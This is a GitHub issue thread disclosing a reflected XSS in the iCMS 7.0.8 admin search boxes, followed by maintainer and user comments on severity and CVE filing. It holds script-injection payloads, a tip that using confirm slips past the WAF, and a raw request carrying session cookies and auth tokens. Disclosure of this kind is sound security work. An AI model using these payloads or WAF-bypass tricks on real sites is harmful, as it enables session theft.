### ISSUE TITLE
iCMS V7.0.8  XSS

### ISSUE THREAD

**Issue by Oran9e** [idreamsoft/iCMS#22]
Log in first （http://127.0.0.1/test/iCMS-7.0/admincp.php）
 All search boxes exist in XSS, payload ：  "/><script>confirm(1234)</script>  
 WeChat - > classified management - > keyword search 
 WAF detects alert, confirm bypasses the waf
payload: "/><script>confirm(document.cookie)</script>

GET /test/iCMS-7.0/admincp.php?appid=27&app=weixin_category&do=list&rootid=-1&perpage=50&orderby=&st=name&keywords="/><script>confirm(1234)</script> HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/test/iCMS-7.0/admincp.php?appid=27&app=weixin_category&do=list&rootid=-1&perpage=50&orderby=&st=name&keywords=%22%2F%3E%3Cscript%3Econfirm%281234%29%3C%2Fscript%3E
Cookie: UM_distinctid=162db899f8a468-018514197574c8-17347a40-100200-162db899f8c3bc; CNZZDATA1707573=cnzz_eid%3D271628251-1524101653-http%253A%252F%252F127.0.0.1%252F%26ntime%3D1524101653; PHPSESSID=k4mlmjoo06qvrnks6hbsut3795; yzmphp_adminid=02fcWP1tbVyO3qjAa1o4Oj7ByNDb2DbcZpROpdWw; yzmphp_adminname=f744FywtmY54ZekJU2rO-dU8YZXZce7dHJjsdStEKAEwM5M; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1524187137; Hm_lpvt_7b43330a4da4a6f4353e553988ee8a62=1524187137; iCMS_iCMS_AUTH=00b2ddb1vfERLavMXxo6%252Bg2QU05Zq%252BV%252Bcd8s931nQIH3xldQPW%252BzibMPYLrXk%252FgJX6m%252BDd600%252FBBvX%252FnkPcrjt7XL4K4y7qyt8KPR8%252BUm1%252Fz3PvNF7Zyuvc; iCMS_tag_category_tabs=tree; rlF_lastvisit=1726%091524191267%09%2Ftest%2Fphpwind_v9.0.2_utf8%2Fphpwind_v9.0.2_utf8_20170401%2Findex.php%3Fm%3Ddesign%26c%3Dapi%26token%3Dt8QiA81ydN%26id%3D7%26format%3D; rlF_visitor=Dn3slOh4nWLgDBhDSMUhGlC3PsR%2FyarbBZim4JqNJp2SKE9mCXr3gw%3D%3D; csrf_token=5ac0a94ca5abfea6; iCMS_weixin_category_tabs=list; iCMS_USER_AUTH=1b2396d4A6f4WNs8th%252B6GGLhZBhatUUXcSwlKB3xtaG3WmK2PWgtcZJR4Zi3S8UwRdvHyVmGz0FrsMblEtj1aTU5bhLzm%252BYRi2LwdTXzqJXlYkWUVW7LV09%252B3D%252FuMSTmpUn5PlIpJ8pSasdbczWvZuLlRuZCRU3Ht7JGNQrdub8xXcVay1m0oRiS6qZPdiG6TO9hVdSfOeNYql6ox5%252FDPCYAQU8crJS8YSygqPFNBT%252BSWXZewYAAz5qF95dWNIF72HRPWsG3fS00JjsS9BbBcEwdkDB3MB2MZYfaGacRkSHPB3o5kV4IFkt4cN8%252FaR8Pl7x2DGtA43IrR4numrJ4tWKirUlTPRTp0HmPE5uF%252BSn7NszGMMB1j%252BrUAjEZG7R%252BYrCKhCeH3uJ4q8h8IGCo7MJH9nhnjJM%252FAbLEDFgA5YqOZWa91towmkldnARYG1kAEIx%252F39e9ZXUZ7kUObCBokPlhM1sw3bBjI7ib4cYHMEGEbdi4H3FTnDN7%252BnRdrAsbgXKSPJf%252BPvr1vRSKpJIEAwKtwVrh; iCMS_userid=be1634298e37Lnx4KiuEVlGxT0HvUyH2JNsWWMUrG5yL; iCMS_nickname=566c9c92iHKsjOiDVwrvS%252BhKjt1XIMfC9MIXSF6pqG5Hu1Ke5UI
Connection: keep-alive
Upgrade-Insecure-Requests: 1

![1](https://user-images.githubusercontent.com/26062651/39041333-2543e982-44bb-11e8-84b5-0356ae8fb187.png)
![2](https://user-images.githubusercontent.com/26062651/39041343-28ee62c4-44bb-11e8-944e-9e72a27eee0e.jpg)

**Comment by hepking** [comment]
这个问题解决了吗？

**Comment by idreamsoft** [comment]
@hepking 由于漏洞出现在后台管理系统,需要有管理员权限才能,进行攻击.
请等待下次版本更新修复

**Comment by intAV** [comment]
这个xss只是那个函数没过滤，我已经测试了，只能弹框，并不能利用

**Comment by hepking** [comment]
不能那么想，安全问题始终是第一位的，不管架构如何

**Comment by idreamsoft** [comment]
@hepking 您说的是,后台的安全问题也是很重要的.

**Comment by sqlsec** [comment]
@idreamsoft  
emmmm Github上面这些开源的CMS属于 CVE范畴  具体看下下面文章~ 安全从业者也不容易呀~
其实我个人认为 管理员后台的xss 没有什么实际的攻击意义 但是没办法 CVE那边收这种漏洞~~
[CVE申请的那些事](http://www.freebuf.com/articles/rookie/168362.html)
